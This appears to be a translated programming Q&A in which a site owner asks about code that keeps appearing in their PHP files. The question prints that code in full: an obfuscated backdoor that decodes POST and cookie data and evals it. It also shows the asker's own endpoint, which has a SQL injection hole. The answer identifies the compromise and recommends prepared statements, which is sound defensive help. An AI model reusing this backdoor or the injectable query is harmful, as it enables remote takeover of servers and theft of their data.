PHP 解析错误：语法错误，意外的 '$y6956096d' (T_VARIABLE)答案

【问题标题】：PHP Parse error: syntax error, unexpected '$y6956096d' (T_VARIABLE)PHP 解析错误：语法错误，意外的 '$y6956096d' (T_VARIABLE)
【发布时间】：2018-02-24 08:31:15
【问题描述】：

我在我的网站上运行 web 服务，但是当运行登录或注册页面等文件时，php 代码会自动运行，并且它会不断添加到同一个文件中。下面是自动添加的代码

<?php $s43150 = 940;$GLOBALS['r3ba0']=Array();global$r3ba0;$r3ba0=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['x09b398d7']="\x51\x6b\x22\x57\x61\x55\x3c\x58\x65\x71\x35\x60\xa\x45\x33\x7a\x5e\x77\x27\x36\x2a\x70\x31\x29\x37\x7e\x68\x7b\x2e\x7d\x34\xd\x4f\x53\x74\x46\x73\x2f\x3b\x78\x5f\x5b\x4d\x3e\x5a\x2c\x40\x28\x59\x6a\x72\x24\x38\x54\x2b\x6c\x76\x62\x43\x32\x5c\x64\x63\x41\x9\x67\x3f\x7c\x30\x6d\x5d\x26\x75\x20\x66\x4c\x47\x25\x50\x21\x52\x79\x2d\x6f\x48\x4a\x49\x42\x4b\x56\x6e\x3a\x4e\x3d\x39\x44\x69\x23";$r3ba0[$r3ba0['x09b398d7'][81].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][68].$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][52].$r3ba0['x09b398d7'][74].$r3ba0['x09b398d7'][59].$r3ba0['x09b398d7'][61]]=$r3ba0['x09b398d7'][21].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][1];$r3ba0[$r3ba0['x09b398d7'][81].$r3ba0['x09b398d7'][59].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][94].$r3ba0['x09b398d7'][57]]=$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][83].$r3ba0['x09b398d7'][72].$r3ba0['x09b398d7'][90].$r3ba0['x09b398d7'][34];$r3ba0[$r3ba0['x09b398d7'][90].$r3ba0['x09b398d7'][10].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][24].$r3ba0['x09b398d7'][22]]=$r3ba0['x09b398d7'][36].$r3ba0['x09b398d7'][72].$r3ba0['x09b398d7'][57].$r3ba0['x09b398d7'][36].$r3ba0['x09b398d7'][34].$r3ba0['x09b398d7'][50];$r3ba0[$r3ba0['x09b398d7'][65].$r3ba0['x09b398d7'][59].$r3ba0['x09b398d7'][10].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][19].$r3ba0['x09b398d7'][68]]=$r3ba0['x09b398d7'][36].$r3ba0['x09b398d7'][34].$r3ba0['x09b398d7'][50].$r3ba0['x09b398d7'][55].$r3ba0['x09b398d7'][8].$r3ba0['x09b398d7'][90];$r3ba0[$r3ba0['x09b398d7'][72].$r3ba0['x09b398d7'][52].$r3ba0['x09b398d7'][30].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][52].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][19].$r3ba0['x09b398d7'][14]]=$r3ba0['x09b398d7'][8].$r3ba0['x09b398d7'][39].$r3ba0['x09b398d7'][21].$r3ba0['x09b398d7'][55].$r3ba0['x09b398d7'][83].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][8];$r3ba0[$r3ba0['x09b398d7'][36].$r3ba0['x09b398d7'][8].$r3ba0['x09b398d7'][52].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][61]]=$r3ba0['x09b398d7'][36].$r3ba0['x09b398d7'][34].$r3ba0['x09b398d7'][50].$r3ba0['x09b398d7'][40].$r3ba0['x09b398d7'][50].$r3ba0['x09b398d7'][8].$r3ba0['x09b398d7'][21].$r3ba0['x09b398d7'][8].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][34];$r3ba0[$r3ba0['x09b398d7'][49].$r3ba0['x09b398d7'][30].$r3ba0['x09b398d7'][74].$r3ba0['x09b398d7'][24].$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][61]]=$_POST;$r3ba0[$r3ba0['x09b398d7'][1].$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][30].$r3ba0['x09b398d7'][14]]=$_COOKIE;$s5e5=Array($r3ba0['x09b398d7'][50].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][90].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][83].$r3ba0['x09b398d7'][69].$r3ba0['x09b398d7'][22]=>$r3ba0['x09b398d7'][50].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][90].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][83].$r3ba0['x09b398d7'][69].$r3ba0['x09b398d7'][59]);$oe83a70e=Array($r3ba0['x09b398d7'][50].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][90].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][83].$r3ba0['x09b398d7'][69].$r3ba0['x09b398d7'][14]=>$r3ba0['x09b398d7'][50].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][90].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][83].$r3ba0['x09b398d7'][69].$r3ba0['x09b398d7'][30]);foreach(Array($s5e5,$r3ba0[$r3ba0['x09b398d7'][49].$r3ba0['x09b398d7'][30].$r3ba0['x09b398d7'][74].$r3ba0['x09b398d7'][24].$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][61]],$oe83a70e,$r3ba0[$r3ba0['x09b398d7'][1].$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][30].$r3ba0['x09b398d7'][14]])as$w67e){foreach($w67eas$t8d84db=>$bc4918ae){$bc4918ae=@$r3ba0[$r3ba0['x09b398d7'][81].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][68].$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][52].$r3ba0['x09b398d7'][74].$r3ba0['x09b398d7'][59].$r3ba0['x09b398d7'][61]]($r3ba0['x09b398d7'][84].$r3ba0['x09b398d7'][20],$bc4918ae);$t8d84db.=$r3ba0['x09b398d7'][52].$r3ba0['x09b398d7'][14].$r3ba0['x09b398d7'][19].$r3ba0['x09b398d7'][24].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][74].$r3ba0['x09b398d7'][52].$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][82].$r3ba0['x09b398d7'][59].$r3ba0['x09b398d7'][74].$r3ba0['x09b398d7'][52].$r3ba0['x09b398d7'][68].$r3ba0['x09b398d7'][82].$r3ba0['x09b398d7'][30].$r3ba0['x09b398d7'][10].$r3ba0['x09b398d7'][94].$r3ba0['x09b398d7'][59].$r3ba0['x09b398d7'][82].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][14].$r3ba0['x09b398d7'][14].$r3ba0['x09b398d7'][8].$r3ba0['x09b398d7'][82].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][30].$r3ba0['x09b398d7'][74].$r3ba0['x09b398d7'][68].$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][24].$r3ba0['x09b398d7'][24].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][59].$r3ba0['x09b398d7'][74];$kfa8=$bc4918ae^$r3ba0[$r3ba0['x09b398d7'][90].$r3ba0['x09b398d7'][10].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][24].$r3ba0['x09b398d7'][22]]($r3ba0[$r3ba0['x09b398d7'][36].$r3ba0['x09b398d7'][8].$r3ba0['x09b398d7'][52].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][61]]($t8d84db,($r3ba0[$r3ba0['x09b398d7'][65].$r3ba0['x09b398d7'][59].$r3ba0['x09b398d7'][10].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][19].$r3ba0['x09b398d7'][68]]($bc4918ae)/$r3ba0[$r3ba0['x09b398d7'][65].$r3ba0['x09b398d7'][59].$r3ba0['x09b398d7'][10].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][19].$r3ba0['x09b398d7'][68]]($t8d84db))+1),0,$r3ba0[$r3ba0['x09b398d7'][65].$r3ba0['x09b398d7'][59].$r3ba0['x09b398d7'][10].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][19].$r3ba0['x09b398d7'][68]]($bc4918ae));$kfa8=$r3ba0[$r3ba0['x09b398d7'][72].$r3ba0['x09b398d7'][52].$r3ba0['x09b398d7'][30].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][52].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][19].$r3ba0['x09b398d7'][14]]($r3ba0['x09b398d7'][97],$kfa8);if($r3ba0[$r3ba0['x09b398d7'][81].$r3ba0['x09b398d7'][59].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][94].$r3ba0['x09b398d7'][57]]($kfa8)==3){eval/*ffbabfdf*/($kfa8[1]($kfa8[2]));exit();}}} ?>

运行文件后出现以下错误

PHP Parse error:  syntax error, unexpected '$y6956096d' (T_VARIABLE)

我找不到这是什么类型的错误。这是在运行 web 服务时进入我的文件的病毒，还是我的代码在点击 php 代码后进入的结果。

我的php代码

<?php
include 'dbconnect.php';

if($_SERVER['REQUEST_METHOD']=="GET"){
    $sub_product=$_GET['sub_product'];

$sql="SELECT distinct `color_name` FROM `product_of_interest` WHERE `sub_product`='$sub_product'";
    $result=mysqli_query($con,$sql);
    $row=mysqli_num_rows($result);

    if($row>0){
        while($r=mysqli_fetch_assoc($result)){
            $name=$r['color_name'];
            $res[]=array("color"=>$name);


        }
    }else{
        $res=array();
    }
    $json=array("response"=>200,"message"=>$res);
}
else{
    $json=array("response"=>408,"message"=>"Request method not accepted");
}

echo json_encode($json);
mysqli_close($con);
header('Content-type:application/json');
?>

【问题讨论】：

标签： php arrays json web-services

【解决方案1】：

您的代码包含 SQL 注入点，并且您的服务器被此脚本入侵。您应该使用准备好的语句。

【讨论】：

祝你一切顺利。查看服务器日志并从禁止攻击 IP 开始。 apache .htaccess 也有一些规则可以防止某些 sql 注入（尝试谷歌搜索）